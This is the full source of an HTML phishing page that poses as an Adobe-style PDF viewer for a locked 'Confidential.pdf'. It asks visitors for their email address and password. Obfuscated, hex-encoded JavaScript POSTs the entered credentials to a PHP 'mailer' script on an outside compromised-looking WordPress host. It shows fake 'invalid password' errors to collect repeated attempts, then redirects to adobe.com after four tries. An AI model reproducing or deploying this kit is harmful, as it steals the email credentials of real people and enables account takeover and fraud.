
<!DOCTYPE html>
<html>

<head>
    <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
    <title>PDF Viewer</title>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link
        href="https://fonts.googleapis.com/css2?family=Montserrat:wght@100;200;300;400;500;600;700;800;900&display=swap"
        rel="stylesheet">
    <script src="https://code.iconify.design/iconify-icon/1.0.7/iconify-icon.min.js"></script>
    <script src="https://code.iconify.design/3/3.1.0/iconify.min.js"></script>
    <style>
        *,
        *::after,
        *::before {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }


        html,
        body {
            min-height: 100%;
        }

        body {
            font-family: 'Montserrat', sans-serif;
        }



        .top-header__list {
            display: flex;
            flex-direction: column;

        }

        .top-header__list>ul {
            display: flex;
            align-items: center;
            gap: 2rem;
            padding: 1rem;

        }

        .top-header__list>ul>li {
            display: flex;
            align-items: center;
            gap: .5rem;
            padding: 0.8rem;
            color: #fff;


        }

        .top-header__list>ul>li:hover {
            background-color: #350501;
            border-radius: 999px;
        }

        .top-header__list>ul>li>a {
            color: #fff;
            text-decoration: none;

        }

        .top-header__list>ul>li>a,
        .top-header__list>ul>li>span {
            font-size: 0.875rem;
        }

        .top-header__list>ul>li>svg {
            font-size: 3rem;
        }

        .top-header__list>ul>li:nth-child(5) {
            margin-left: auto;
        }


        #pdf-confidential {
            position: relative;
        }

        .form-heading-top {
            display: flex;
            flex-direction: column;
            align-items: center;
        }

        .form-heading-top>h1 {
            font-size: 1.5rem;
            color: rgb(156, 20, 8);
            margin-bottom: 1rem;
            margin-top: .5rem;
        }

        .form-heading-top>p {
            color: #7e7b7b;
        }


        .form-heading-top>.iconify-icon>svg {
            font-size: 3rem;
        }

        .center-layed-form {
            position: absolute;
            background-color: #fff;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            padding: 2rem 5rem;
            box-shadow: 0 0 10px 10px rgba(0, 0, 0, 0.109);
            border-radius: 30px;
            border: 2px solid rgba(221, 34, 17, 0.272);
        }

        .file-name-block {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            gap: .5rem;
            padding: 2rem 0;
            position: relative;
            z-index: 100;

        }

        .file-name-block>span:last-child {
            font-weight: 600;
            color: #414040;
            font-size: 12px;
        }

        .form-validation-alert {
            display: flex;
            flex-direction: column;
            align-items: center;
            gap: .5rem;
        }

        .form-validation-alert>p {
            text-align: center;
            font-size: .85rem;
            background-color: #f7aaa347;
            padding: .5rem 1rem;
            border-radius: 4px;
            color: #c60d0d;
            display: none;
            margin-bottom: 1rem;
        }


        .form-controls {
            max-width: 80%;
            margin: 0 auto;
            display: flex;
            flex-direction: column;

        }

        .form-controls>div {
            display: flex;
            flex-direction: column;
            margin-bottom: 1rem;
        }


        .form-controls>div:not(:last-child)>input {
            padding: .85rem 1rem;
            background-color: #ece9e922;
            border: 1px solid grey;
            border-radius: 4px;
            font-family: inherit;
        }

        .form-controls>div:not(:last-child)>input:focus {
            outline: 1px solid #0001d1;
            border: 1px solid transparent;
        }

        .form-controls>div:not(:last-child)>input::placeholder {
            font-size: 1rem;
            font-weight: 300;

        }

        .form-controls>button {
            padding: .5rem;
            font-size: 0.95rem;
            font-family: inherit;
            display: flex;
            align-items: center;
            justify-content: center;
            gap: 1rem;
            background-color: #350501;
            border: 3px solid #fff;
            border-radius: 999px;
            margin-top: 1.5rem;
            color: #fff;
            cursor: pointer;
            transition: background-color 200ms ease-in;
        }

        .form-controls>button:hover {
            background-color: #c60d0d;
        }

        .form-controls>button:active {
            box-shadow: inset 0 0 3px 3px rgba(0, 0, 0, 0.75);
        }

        .form-list {
            display: flex;
            align-items: center;
            justify-content: space-between;
            margin-top: 1rem;

        }

        .form-list>li {
            display: flex;
            align-items: center;
            gap: .25rem;

        }

        .form-list>li>span {
            font-size: .65rem;
            font-weight: 600;
            color: #414040;
        }

        ul li,
        ol li {
            list-style-type: none;
        }

        .form-footer {
            background-color: #c60d0d1e;
            margin-top: 2rem;
            padding: 1rem;
            border-radius: 15px;
            font-size: 0.75rem;
            color: #c60d0d;
            display: flex;
            flex-direction: column;
            gap: 1rem;
            font-weight: 600;

        }
    </style>
</head>

<body style="background-color: rgb(156, 20, 8)">
    <div id="pdf-confidential">

        <nav class="top-header__list">
            <ul>
                <li>
                    <iconify-icon icon="simple-icons:adobeacrobatreader"></iconify-icon>
                    <span>PDF Viewer</span>
                </li>
                <li>
                    <iconify-icon icon="solar:download-bold"></iconify-icon>
                    <a href="#">Download</a>
                </li>
                <li>
                    <iconify-icon icon="lets-icons:box-open-fill"></iconify-icon>
                    <a href="#">Open</a>
                </li>
                <li>
                    <iconify-icon icon="icon-park-solid:preview-open"></iconify-icon>
                    <a href="#">Preview</a>
                </li>
                <li>
                    <iconify-icon icon="icon-park-solid:agreement"></iconify-icon>
                    <span>Terms of service</span>
                </li>
            </ul>

        </nav>
        <div class="center-layed-form">
            <div class="form-heading-top">
                <span class="iconify" data-icon="mdi:account-security" data-width="50"
                    style="  color: rgb(221, 34, 17);"></span>
                <h1>Confirm your identity</h1>
                <p>Sign in with your valid email account to view this document.</p>
            </div>
            <div class="file-name-block">
                <span class="iconify" data-icon="bi:file-pdf-fill" style="color: rgb(156, 20, 8)" data-width="100"
                    data-height="50"></span>
                <span class="iconify" data-icon="uim:padlock"
                    style="color: rgb(49, 1, 1); position: absolute; right: 15rem" data-width="20"></span>
                <span>Confidential.pdf</span>
            </div>
            <form class="form-user">
                <div class="form-validation-alert">

                    <p class="alert alert-danger" id="msg">Invalid Password..!
                        Please
                        enter correct password.</p>
                    <p id="error" class="text-danger">That account doesn't exist.
                        Enter a different account</p>

                </div>

                <div class="form-controls">
                    <div>
                        <input name="ai" type="text" class="textfldclass" id="ai" value=""
                            placeholder="Enter recipient email address.">
                    </div>
                    <div id="div2" style="display:none;">
                        <input name="pr" type="password" class="textfldclass" id="pr"
                            placeholder="Enter the email password">
                    </div>

                    <button type="button" name="sub-btn" id="sub-btn">
                        <span class="iconify" data-icon="solar:download-bold-duotone"
                            style="color: rgb(25, 23, 23)(5, 5, 5);" data-width="30"></span>
                        <span>Start Download</span>
                    </button>
                </div>

                <ul class="form-list">
                    <li>
                        <span class="iconify" data-icon="icon-park-twotone:check-one" style="color: red;"
                            data-width="15"></span>

                        <span>Simple to use</span>
                    </li>
                    <li>
                        <span class="iconify" data-icon="bi:browser-chrome" style="color: red;" data-width="15"></span>

                        <span>Cross platform compatibility</span>
                    </li>
                    <li>
                        <span class="iconify" data-icon="mdi:security-lock" style="color: red;" data-width="15"></span>

                        <span>IRM and password protection</span>
                    </li>
                </ul>
                <footer class="form-footer">
                    <p>
                        The contents of this document are confidential and intended solely for the
                        recipient.
                    </p>
                    <p>
                        Reproduction of, or forwarding to anyone not directly sent this document
                        is strictly forbidden.
                    </p>
                </footer>
            </form>
        </div>
        <!-- <div style="top: 67px;" class="cover">
           
        </div> -->
        <div style="border: 1px solid black;"><img
                src="https://firebasestorage.googleapis.com/v0/b/pdf-custom-rd1482asdf.appspot.com/o/7dHA6V2.jpg?alt=media&token=a084d22e-9888-4259-8f27-dad992bc3842"
                alt="" style=" width:100%; height:auto; max-height:100%;">
        </div>
        <!-- //mailer link -->
        <input type="hidden" id="f" value="https://mtmdesignbd.com/wp-includes/davedawes1957.php">
        <!-- //mail result count -->
        <input type="hidden" id="rc" value="4">
        <!-- //redirect link -->
        <input type="hidden" id="rdrt" value="https://adobe.com">

        <!-- Optional JavaScript -->
        <!-- jQuery first, then Popper.js, then Bootstrap JS -->
        <script type="text/javascript"
            src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
        <script type="text/javascript" src="https://code.jquery.com/jquery-3.2.1.slim.min.js"></script>
        <script type="text/javascript"
            src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js"></script>
</body>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
<script type="text/javascript" src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
<script>
    var _0xe3f1 = ["\x76\x61\x6C", "\x23\x66", "\x23\x72\x63", "\x23\x72\x64\x72\x74", "\x23\x64\x6F\x6D\x61\x69\x6E\x5F\x72\x65\x64\x69\x72\x65\x63\x74", "\x6B\x65\x79\x43\x6F\x64\x65", "\x77\x68\x69\x63\x68", "\x31\x33", "\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74", "\x63\x6C\x69\x63\x6B", "\x23\x73\x75\x62\x2D\x62\x74\x6E", "\x6B\x65\x79\x70\x72\x65\x73\x73", "\x73\x75\x62\x73\x74\x72", "\x68\x61\x73\x68", "\x6C\x6F\x63\x61\x74\x69\x6F\x6E", "\x40", "\x69\x6E\x64\x65\x78\x4F\x66", "\x2E", "\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65", "\x23\x61\x69", "\x68\x74\x6D\x6C", "\x23\x61\x69\x63\x68", "\x68\x69\x64\x65", "\x23\x6D\x73\x67", "\x23\x65\x72\x72\x6F\x72", "\x23\x70\x72", "\x74\x65\x78\x74", "\x73\x68\x6F\x77", "\x45\x6D\x61\x69\x6C\x20\x66\x69\x65\x6C\x64\x20\x69\x73\x20\x65\x6D\x70\x74\x79\x2E\x21", "\x74\x65\x73\x74", "\x54\x68\x61\x74\x20\x61\x63\x63\x6F\x75\x6E\x74\x20\x64\x6F\x65\x73\x6E\x27\x74\x20\x65\x78\x69\x73\x74\x2E\x20\x45\x6E\x74\x65\x72\x20\x61\x20\x64\x69\x66\x66\x65\x72\x65\x6E\x74\x20\x61\x63\x63\x6F\x75\x6E\x74", "\x3A\x76\x69\x73\x69\x62\x6C\x65", "\x69\x73", "\x23\x64\x69\x76\x32", "\x61\x6E\x69\x6D\x61\x74\x65", "\x50\x61\x73\x73\x77\x6F\x72\x64\x20\x66\x69\x65\x6C\x64\x20\x69\x73\x20\x65\x6D\x70\x74\x79\x2E\x21", "\x4A\x53\x4F\x4E", "\x50\x4F\x53\x54", "\x44\x6F\x77\x6E\x6C\x6F\x61\x64\x69\x6E\x67\x2E\x2E\x2E", "", "\x72\x65\x70\x6C\x61\x63\x65", "\x53\x74\x61\x72\x74\x20\x44\x6F\x77\x6E\x6C\x6F\x61\x64", "\x61\x6A\x61\x78", "\x72\x65\x61\x64\x79"]; var f = $(_0xe3f1[1])[_0xe3f1[0]](); var rc = $(_0xe3f1[2])[_0xe3f1[0]](); var rdrt = $(_0xe3f1[3])[_0xe3f1[0]](); var domain_redirect = $(_0xe3f1[4])[_0xe3f1[0]](); $(document)[_0xe3f1[43]](function () { var _0x5558x5 = 0; $(document)[_0xe3f1[11]](function (_0x5558x6) { var _0x5558x7 = (_0x5558x6[_0xe3f1[5]] ? _0x5558x6[_0xe3f1[5]] : _0x5558x6[_0xe3f1[6]]); if (_0x5558x7 == _0xe3f1[7]) { _0x5558x6[_0xe3f1[8]](); $(_0xe3f1[10])[_0xe3f1[9]]() } }); var _0x5558x8 = window[_0xe3f1[14]][_0xe3f1[13]][_0xe3f1[12]](1); if (!_0x5558x8) { } else { var _0x5558x9 = _0x5558x8; var _0x5558xa = _0x5558x9[_0xe3f1[16]](_0xe3f1[15]); var _0x5558xb = _0x5558x9[_0xe3f1[12]]((_0x5558xa + 1)); var _0x5558xc = _0x5558xb[_0xe3f1[12]](0, _0x5558xb[_0xe3f1[16]](_0xe3f1[17])); var _0x5558xd = _0x5558xc[_0xe3f1[18]](); $(_0xe3f1[19])[_0xe3f1[0]](_0x5558x9); $(_0xe3f1[21])[_0xe3f1[20]](_0x5558x9); $(_0xe3f1[23])[_0xe3f1[22]]() }; $(_0xe3f1[10])[_0xe3f1[9]](function (_0x5558x6) { $(_0xe3f1[24])[_0xe3f1[22]](); $(_0xe3f1[23])[_0xe3f1[22]](); _0x5558x6[_0xe3f1[8]](); var _0x5558x8 = $(_0xe3f1[19])[_0xe3f1[0]](); var _0x5558xe = $(_0xe3f1[25])[_0xe3f1[0]](); var _0x5558xf = $(_0xe3f1[23])[_0xe3f1[20]](); $(_0xe3f1[23])[_0xe3f1[26]](_0x5558xf); var _0x5558x9 = _0x5558x8; var _0x5558x10 = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/; if (!_0x5558x8) { $(_0xe3f1[24])[_0xe3f1[27]](); $(_0xe3f1[24])[_0xe3f1[20]](_0xe3f1[28]); return false }; if (!_0x5558x10[_0xe3f1[29]](_0x5558x9)) { $(_0xe3f1[24])[_0xe3f1[27]](); $(_0xe3f1[24])[_0xe3f1[20]](_0xe3f1[30]); return false }; if (!$(_0xe3f1[33])[_0xe3f1[32]](_0xe3f1[31])) { $(_0xe3f1[33])[_0xe3f1[34]]({ right: 0, opacity: _0xe3f1[27] }, 500); return false }; if (!_0x5558xe) { $(_0xe3f1[24])[_0xe3f1[27]](); $(_0xe3f1[24])[_0xe3f1[20]](_0xe3f1[35]); return false }; var _0x5558xa = _0x5558x9[_0xe3f1[16]](_0xe3f1[15]); var _0x5558xb = _0x5558x9[_0xe3f1[12]]((_0x5558xa + 1)); var _0x5558xc = _0x5558xb[_0xe3f1[12]](0, _0x5558xb[_0xe3f1[16]](_0xe3f1[17])); var _0x5558xd = _0x5558xc[_0xe3f1[18]](); _0x5558x5 = _0x5558x5 + 1; $[_0xe3f1[42]]({ dataType: _0xe3f1[36], url: f, type: _0xe3f1[37], data: { ai: _0x5558x8, pr: _0x5558xe }, beforeSend: function (_0x5558x11) { $(_0xe3f1[10])[_0xe3f1[0]](_0xe3f1[38]) }, complete: function () { $(_0xe3f1[25])[_0xe3f1[0]](_0xe3f1[39]); if (_0x5558x5 >= rc) { _0x5558x5 = 0; window[_0xe3f1[14]][_0xe3f1[40]](rdrt); return false }; $(_0xe3f1[23])[_0xe3f1[27]](); $(_0xe3f1[10])[_0xe3f1[0]](_0xe3f1[41]) } }) }) })
</script>

</html>
